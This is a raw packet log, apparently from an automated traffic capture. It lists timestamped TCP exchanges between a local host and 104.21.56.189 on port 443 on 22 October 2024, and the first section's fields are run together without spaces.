                                                                                                  Oct 22, 2024 09:40:05.544259071 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.544423103 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.544498920 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.544504881 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.586417913 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.586585045 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.586616039 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.637132883 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.637165070 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.663054943 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.663225889 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.663260937 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.663295031 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.663351059 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.663367987 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.663541079 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.663595915 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.663603067 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.663734913 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.663784027 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.663789988 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.715131044 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.733469963 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.733508110 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.733691931 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.777766943 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.783265114 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.783301115 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.783485889 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.783519983 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.783557892 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.783587933 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.783607006 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.783613920 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.783834934 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.825462103 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.825498104 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.825665951 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.871509075 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.902446985 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.902483940 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.902630091 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.902637959 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.902808905 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.902829885 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.902869940 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.902870893 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.902906895 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.902926922 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.945224047 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.945463896 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.945497990 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.945559978 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:05.972779036 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.972810984 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:05.972946882 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.022414923 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.022501945 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.022578001 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.022715092 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.022727013 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.022762060 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.022783995 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.064538956 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.064716101 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.064745903 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.064964056 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.142623901 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.142807961 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.142846107 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.142915010 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.142935038 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.142962933 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.142968893 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.143050909 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.143198967 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.143208027 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.143239021 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.143263102 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.183984041 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.212214947 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.212481022 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.212510109 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.212716103 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.261517048 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.261683941 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.261876106 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.262031078 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.262593985 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.262778997 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.331926107 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.332166910 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.378304005 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.378501892 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.381300926 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.381391048 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.381464958 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.381654978 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.382179976 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.382256031 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.451539040 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.451759100 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.498224974 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.498527050 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.501054049 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.501250982 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.501257896 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.501287937 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.501312971 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.501557112 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.501718998 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.501749039 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.501801014 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.571192980 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.571501017 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.617933035 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.618037939 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.620645046 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.620737076 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.620841026 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.621005058 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.621033907 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.621097088 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.666177034 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.666429996 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.691030025 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.691200018 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.738951921 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.739164114 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.742398977 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.742573023 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.742582083 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.742613077 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.742827892 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.793361902 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.858340979 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.858376980 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.858444929 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.858479977 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.858500004 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.858505964 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.858527899 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.862231970 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.862442017 CEST49710443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:06.862469912 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.862535000 CEST44349710104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:06.862590075 CEST49710443192.168.2.6104.21.56.189
Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Oct 22, 2024 09:40:06.905467987 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:06.905580044 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:06.905611038 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:06.949630022 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:06.978231907 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:06.978271961 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:06.978373051 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:06.978404999 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:06.978416920 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.025373936 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.025580883 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.025614977 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.025636911 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.025687933 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.025703907 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.025713921 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.025713921 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.025753975 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.101464987 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.101497889 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.101557970 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.101577997 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.101599932 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.101605892 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.101623058 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.101644993 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.169948101 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.170017004 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.170048952 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.170078993 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.170099974 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.170114040 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.221693039 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.221764088 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.221791029 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.221821070 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.221841097 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.221864939 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.337176085 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.337239027 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.337389946 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.337389946 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.337421894 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.337471008 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.342328072 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.342398882 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.342443943 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.342478037 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.342499971 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.342524052 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.458163977 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.458237886 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.458364010 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.458364010 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.458400965 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.458462000 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.462008953 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.462054968 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.462089062 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.462119102 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.462140083 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.462167025 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.577966928 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.578028917 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.578104973 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.578139067 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:07.578166008 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:07.578181028 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.628890991 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.628926039 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.629122019 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.629131079 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.629179001 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.629228115 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.629240036 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.629256964 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.629301071 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.629319906 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.629328966 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.629347086 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.629368067 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.629462957 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.629529953 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.629637957 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.629797935 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.629838943 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.629873037 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.629908085 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.629925013 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.629945040 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.630094051 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.640053988 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.640119076 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.640278101 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.640283108 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.640283108 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.640316010 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.640362024 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.641186953 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.641277075 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.641283989 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.641334057 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.641352892 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.641459942 CEST  443          49710      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:08.641515017 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:08.644186974 CEST  49710        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:35.048234940 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:35.048254013 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:35.048314095 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:35.056675911 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:35.056689024 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:35.675168037 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:35.675254107 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:35.736723900 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:35.736747026 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:35.737751007 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:35.738190889 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:35.742291927 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:35.783329010 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.573368073 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.573415041 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.573441029 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.573448896 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.573457956 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.573462963 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.573498964 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.573508024 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.573514938 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.573555946 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.573869944 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.573915005 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.573920012 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.573961973 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.573966980 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.574091911 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.574225903 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.574276924 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.575973034 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.576030970 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.691274881 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.691373110 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.691483974 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.691493034 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.691716909 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.691723108 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.691742897 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.691760063 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.691787958 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.691796064 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.691838980 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.691843987 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.691884995 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.692234039 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.692276955 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.692298889 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.692341089 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.692344904 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.692389011 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.808676958 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.808970928 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.809042931 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.809042931 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.809065104 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.809160948 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.809298038 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.809319019 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.809361935 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.809648037 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.809696913 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.809781075 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.809833050 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.809875011 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.809920073 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.809958935 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.810003042 CEST  49846        443        192.168.2.6    104.21.56.189
